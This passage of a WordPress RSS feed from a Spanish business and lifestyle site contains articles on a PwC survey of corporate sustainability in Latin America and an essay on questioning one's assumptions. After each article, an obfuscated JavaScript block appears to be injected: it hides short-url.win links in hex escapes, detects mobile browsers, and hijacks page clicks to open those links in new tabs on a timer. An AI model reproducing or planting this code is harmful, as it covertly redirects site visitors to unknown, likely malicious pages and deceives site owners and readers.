)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4b\x4d\x41\x30\x63\x360','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x69\x4d\x59\x31\x63\x381',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>
<p><a href="https://www.todoenunclick.com/hipertension-factor-riesgo-cardiovascular-ascenso/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">80828</post-id>	</item>
		<item>
		<title>La sostenibilidad y el largo plazo son la prioridad en el 80% de las empresas</title>
		<link>https://www.todoenunclick.com/la-sostenibilidad-largo-plazo-la-prioridad-80-las-empresas/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Fri, 11 Mar 2016 23:16:00 +0000</pubDate>
				<category><![CDATA[Empresas y Negocios]]></category>
		<category><![CDATA[cadena de valor]]></category>
		<category><![CDATA[Riesgo]]></category>
		<category><![CDATA[Sostenibilidad]]></category>
		<guid isPermaLink="false">http://www.todoenunclick.com/?p=79878</guid>

					<description><![CDATA[<p><img width="642" height="469" src="https://www.todoenunclick.com/wp-content/uploads/2016/03/427406.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2016/03/427406.jpg?w=642&amp;ssl=1 642w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2016/03/427406.jpg?resize=575%2C420&amp;ssl=1 575w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2016/03/427406.jpg?resize=640%2C468&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2016/03/427406.jpg?resize=219%2C160&amp;ssl=1 219w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2016/03/427406.jpg?resize=460%2C336&amp;ssl=1 460w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2016/03/427406.jpg?resize=600%2C438&amp;ssl=1 600w" sizes="auto, (max-width: 642px) 100vw, 642px" /></p><em>Cuatro de cada diez empresas de la región latinoamericana ya incluyen esta temática como parte de su estrategia central de negocio</em>

<hr />

La sostenibilidad no para de escalar posiciones en el ranking de preocupaciones de las empresas latinoamericanas, ubicándose incluso al tope de las prioridades de las principales compañías.

En la región, casi el 80% de las empresas considera que es un tema relevante para su negocio, según determinó la última Encuesta PwC sobre Sostenibilidad en América Latina, realizada con la colaboración del IAE Business School y CEADS.

Según el estudio, un 43% de los consultados indicó que la temática es parte de su estrategia central y se posiciona en los primeros lugares de sus prioridades.

Solo un 1% opinó que no es un tema relevante en su agenda de trabajo, según informó la consultora a través de un comunicado.

Una de las consultas realizadas a los ejecutivos en esta segunda edición del relevamiento, se refirió al año en el cual su compañía formalizó una agenda de sostenibilidad.

En este sentido, más del 50% de las organizaciones estableció una agenda corporativa en esta temática en algún momento de los últimos 7 años, siendo 2008 un año de inflexión a partir del cual la mayoría de las empresas dieron lugar a este proceso.

Otro tema a tratar fue si en sus reuniones la sostenibilidad forma parte de la agenda de discusión habitual. Y si bien en un 50% de los casos se discuten y toman decisiones sobre aspectos de sostenibilidad en todas o en la mayoría de los encuentros del directorio, un 39% de los ejecutivos indicó que el tema es tratado solamente si se presenta una necesidad o un riesgo.

Según PwC, esto hace que las áreas responsables de este tema diseñen estrategias de sostenibilidad con mayor frecuencia y no de forma reactiva.

Con referencia a los beneficios que trae la sostenibilidad, las empresas los perciben de maneras diferentes. La mayoría de los encuestados se inclinó hacía cuestiones asociadas a la mejora de la marca y la reputación (59%) y el fortalecimiento de sus relaciones con los grupos de interés (45 por ciento).

La tercera opción más seleccionada fue la permanencia en el largo plazo y fue seleccionada por el 38% de los ejecutivos.

<strong>Cambios en agenda</strong>
En cuanto a las tendencias en la materia que se registran en la región, las más relevantes para los próximos cinco años son:

- sostenibilidad en la cadena de valor,

- innovación y desarrollo de nuevos modelos de negocio, productos y servicios a través de esta modalidad,

- consumo responsable y productos más sostenibles

- transición hacia una economía baja en carbono.

En relación a las primeras tres tendencias, alrededor de un 40% de las compañías encuestadas señaló que las mismas están contempladas en sus agendas y que cuentan con acciones concretas en la actualidad.

En relación a la rentabilidad, un 44% de los ejecutivos destacó que sus acciones de sostenibilidad la aumentan.

Adicionalmente, un 31% opinó que no la aumenta ni la disminuye y sólo un 2% marcó que estas acciones en realidad generan una caída de su rentabilidad.

Los indicadores que se usan para medir la rentabilidad son varios, entre ellos, "retorno a la inversión", "consumo" y "ahorro" (principalmente de agua, residuos y energía).

<strong>Todavía una percepción</strong>
Marcelo Iezzi, líder de la práctica de Desarrollo Sostenible de PwC Argentina señaló que "a la luz de los resultados referidos al impacto en la rentabilidad, inferimos que la mayoría de estas respuestas se encuentran en el campo de la percepción, ya que sólo un 30% de los ejecutivos indicó que cuenta realmente con indicadores para medir el impacto de sus acciones de sostenibilidad en términos de rentabilidad".

"Desarrollar e identificar este tipo de indicadores será un verdadero desafío para las organizaciones en los próximos años, pero les permitirá mejorar la eficiencia de sus esfuerzos en este campo", apuntó el ejecutivo de PwC.

Un 43% de las empresas participantes posee un reporte de sustentabilidad, y según los ejecutivos, este reporte es una herramienta de gestión y un compromiso con los grupos de interés, que además, mejora la reputación.

Por el contrario, un 52% indicó que no cuentan con estos informes. De ese grupo, un 34% mencionó que tiene previsto contar con uno, mientras que el otro 18% no planifica publicarlo.

Por último, en referencia al cambio climático, el 30% de los ejecutivos informó que no reporta públicamente la emisión de sus gases de efecto invernadero mientras que el 46% lo realiza mediante el CDP o el reporte de sustentabilidad. Sobre aquellas que publican, el 65% verifica la información por una tercera parte independiente.

<strong>Vínculos duraderos y riesgos</strong>
En cuanto a las iniciativas de sostenibilidad en la cadena de valor, un 72% de los ejecutivos consultados señaló que cuenta con medidas de este estilo en su compañía.

Dentro de este porcentaje, la necesidad de construir relaciones a largo plazo que contribuyan con un contexto favorable para el desarrollo de los negocios fue la respuesta más valorada por los encuestados (61%).

En segundo lugar, a una distancia considerable, los riesgos legales y operacionales que implica la no gestión de estos aspectos y los riesgos reputacionales (28%), y en tercer lugar se encuentra el mantenimiento de la licencia social para operar frente a la comunidad y otros grupos de interés (26%).
<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x61\x69\x6a\x33\x63\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x54\x59\x67\x35\x63\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4c\x55\x4b\x38\x63\x398','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4e\x56\x6d\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x64\x6c\x79\x34\x63\x344','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x65\x72\x66\x37\x63\x307','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x75\x76\x44\x32\x63\x392','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x72\x77\x64\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4b\x4d\x41\x30\x63\x360','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x69\x4d\x59\x31\x63\x381',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>
<p><a href="https://www.todoenunclick.com/la-sostenibilidad-largo-plazo-la-prioridad-80-las-empresas/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">79878</post-id>	</item>
		<item>
		<title>¿Como desafiar lo que damos por sentado?</title>
		<link>https://www.todoenunclick.com/como-desafiar-lo-que-damos-por-sentado/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Thu, 11 Feb 2016 16:42:50 +0000</pubDate>
				<category><![CDATA[Empresas y Negocios]]></category>
		<category><![CDATA[errores]]></category>
		<category><![CDATA[escuchar]]></category>
		<category><![CDATA[experiencia]]></category>
		<category><![CDATA[resultados]]></category>
		<category><![CDATA[Riesgo]]></category>
		<guid isPermaLink="false">http://www.todoenunclick.com/?p=79418</guid>

					<description><![CDATA[<p><img width="640" height="469" src="https://www.todoenunclick.com/wp-content/uploads/2014/07/Ing-Jose-Arevalo.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2014/07/Ing-Jose-Arevalo.jpg?w=640&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2014/07/Ing-Jose-Arevalo.jpg?resize=218%2C160&amp;ssl=1 218w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2014/07/Ing-Jose-Arevalo.jpg?resize=459%2C336&amp;ssl=1 459w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2014/07/Ing-Jose-Arevalo.jpg?resize=573%2C420&amp;ssl=1 573w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2014/07/Ing-Jose-Arevalo.jpg?resize=80%2C60&amp;ssl=1 80w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2014/07/Ing-Jose-Arevalo.jpg?resize=300%2C219&amp;ssl=1 300w" sizes="auto, (max-width: 640px) 100vw, 640px" /></p><em>Si los demás nos dicen algo hacemos suposiciones, y si no nos dicen nada también. Si oímos algo y no lo entendemos, hacemos suposiciones sobre lo que significa. Hacemos todo tipo de suposiciones porque no tenemos el valor de preguntar. ¿Por qué suponemos? ¿Por qué opinamos o actuamos sin tener pruebas?</em>

<hr />

<strong>Imaginar el futuro, influenciar en presente</strong>

En el acto de suponer, las teorías se apoyan en nuestras convicciones, y estas se afirman en los juicios que hemos adoptado y realizado a lo largo de nuestras vidas. Si predecimos que algo va a ocurrir, habitualmente nos basamos en experiencias previas que, en algunos casos, nos tienen atrapados. Desde este punto de partida, no estaríamos interactuando con lo que nos rodea, sino con nosotros mismos. Es decir, con lo que nosotros pensamos de lo que nos rodea.

Existen conjeturas hacia nosotros mismos basadas en múltiples temas, que van desde la salud, hasta la amistad o el amor. Nos acompañan todo el tiempo con el objetivo de que las realicemos. O simplemente para proyectar a futuro, crear posibles escenarios, o completar el desarrollo de algo que creemos que está por venir.

Solemos sospechar posibles acciones y desenlaces que pueden ocurrir en nuestras vidas, concibiendo todo tipo de resultados. Esto determinará la calidad de vida, no solo de nuestro futuro, sino también de nuestro presente, puesto que estas imaginaciones dispararán distintas conversaciones internas que incidirán en nosotros. Así queda afectada nuestra emocionalidad y nuestro estado de ánimo.

Conjeturamos que determinada meta será muy difícil de conseguir o que nuestro problema no tiene solución.

Cuando suponemos algo sin consultar a quienes podemos afectar, de buena o de mala manera, lo hacemos desde nuestras convicciones. Esto suele generar la ilusión de que estamos interactuando con ellos, pero en realidad lo hacemos con nosotros mismos, y con nuestras propias creencias. Por eso, considerar que alguien no puede ayudarnos, sin consultarle, es no darle la chance de que pueda aportarnos algo que nos facilite solucionar nuestro problema. Del mismo modo, creer que nuestros inconvenientes no tienen salida, es un punto de partida que no nos dará una apertura de posibilidades para encontrar la respuesta sino que, por el contrario, cerrará el camino para hallarla salida. Por más que nos griten la solución, no estaremos abiertos a escucharla.

<strong>¿Una escala de errores?</strong>

Si pudiéramos darnos cuenta de los inconvenientes que suelen acarrear las suposiciones, podríamos ser más precavidos, y desafiar esas conjeturas que limitan nuestro campo de análisis y de acción.

Entonces, entenderíamos que la frase “Será que…”puede ser incorrecta para quien busca respuestas.Tal es así que las figuraciones también se denominan “escaleras de inferencias”, porque subimos escalón tras escalón para alcanzar un resultado o razonamiento, que nos permita encontrar la solución.

Cada peldaño estará hecho de juicios que nos ayudarán a ir construyendo el que sigue y, de esta forma, llegar a la cima. Dependerá de nosotros, si hemos cimentado bien o mal la escalera.

No hay desarrollo ni estilos de presunciones que nos aseguren el éxito. Pero si tenemos en cuenta que cada peldaño depende de nuestro observador, y que estos pueden ser desafiados para mejorar nuestro análisis, podremos acotar el margen de error.

<strong>Suponer y padecer</strong>

Sospechar escenarios terribles de situaciones que aún no han ocurrido, donde seríamos víctimas de las circunstancias, puede ser un desgaste tremendo. ¿Cuántas veces creímos algo que nos paralizó, anticipadamente, y que nunca sucedió?

Cuando nos enfocamos en nuestros temores, solemos presumir que van a ocurrir situaciones difíciles, que posiblemente nos hundirán en el más complicado de los mundos. Nos orientamos hacialas amenazas que juzgamos que se van a presentar, y en que estas no nos permitirán afrontar lo que todavía no sucede.

Una alternativa posible es cambiar el enfoque. La idea es visualizar los recursos de los que disponemos, para aumentar las posibilidades de acción a nuestro favor. De este modo, ejercitaremos una emocionalidad que abra alternativas, que nos dé optimismo y esperanza para confiar en el futuro.

<strong>Desafiar lo que damos por sentado</strong>

Las preguntas son el camino para salir del espacio de ceguera, que no permite que podamos visualizar lo que no tenemos chequeado con las teorías que imaginamos.

Entendemos que hacemos suposiciones dado que tenemos ciertas creencias, pero es posible que nuestras creencias nos tengan a nosotros. Por lo tanto, somos víctimas de ellas y de las figuraciones que se apoyen en ellas.

Una forma de desafiar nuestras creencias es a través de la averiguación, sin olvidarnos del “para qué”. De esta manera, es preciso que nos sinceremos: ¿nos preguntamos para seguir suponiendo lo mismo y fundamentar nuestras conjeturas? ¿Tenemos una intención real de desafiar aquello que venimos sosteniendo?

No va a servir de mucho si solo preguntamos para justificar lo que venimos presumiendo. En cambio, podemos enriquecernos si invitamos a nuevas miradas sobre los temas que nos inquietan. En ese caso, nuestras preguntas necesitarán estar enfocadas desde una apertura, y nuestro observador requerirá verle valor a la consulta para analizar la salida.

<strong>El otro, un factor clave</strong>

La indagación nos orienta acerca de qué camino tomar en el terreno de las figuraciones. Una mirada amiga, una consulta o simplemente una conversación, pueden aportarnos una observación distinta de la nuestra. Así, desafiaremos las creencias limitantes que podríamos tener al armar nuestra escalera de inferencias.

Incluir a otro antes de rematar nuestros supuestos, no solo lo legitima, sino que también nos despeja dudas, que de otra manera aparecerían y serían contestadas solo por nosotros, con el riesgo que eso conlleva. A veces, lo hipotético se da por sentado, y pese a que no existen pruebas al respecto, optamos por convencernos de nuestra suposición, sin molestarnos por preguntar y corroborar.

Tenemos la oportunidad de consultar a otros sus puntos de vista, y desde allí sacar conclusiones enriquecedoras, que nos permitan alcanzar resultados más efectivos para nuestras vidas.
<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x61\x69\x6a\x33\x63\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x54\x59\x67\x35\x63\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4c\x55\x4b\x38\x63\x398','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4e\x56\x6d\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x64\x6c\x79\x34\x63\x344','\x68\x74\x74\x